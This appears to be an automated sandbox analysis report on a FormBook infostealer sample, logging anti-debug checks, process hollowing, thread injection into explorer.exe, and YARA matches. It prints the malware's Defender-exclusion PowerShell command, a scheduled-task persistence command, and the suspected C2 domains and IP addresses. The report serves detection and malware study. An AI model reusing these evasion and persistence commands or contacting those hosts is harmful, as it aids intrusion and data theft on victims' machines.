          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01817D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.miabellavita.com
          Source: C:\Windows\explorer.exeDomain query: www.joye.club
          Source: C:\Windows\explorer.exeDomain query: www.maikoufarm.com
          Source: C:\Windows\explorer.exeDomain query: www.mmj0115.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exeDomain query: www.septemberstockevent200.com
          Source: C:\Windows\explorer.exeDomain query: www.watermountsteam.top
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.4.114 80
          Source: C:\Windows\explorer.exeDomain query: www.yungbredda.com
          Source: C:\Windows\explorer.exeDomain query: www.leewaysvcs.com
          Source: C:\Windows\explorer.exeDomain query: www.sharpstead.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.122.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.188.247 80
          Source: C:\Windows\explorer.exeNetwork Connect: 101.132.116.91 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\vbc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 120000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\vbc.exeThread register set: target process: 3292
          Source: C:\Users\user\Desktop\vbc.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3292
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.305520960.0000000005F40000.00000004.00000001.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.266771972.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
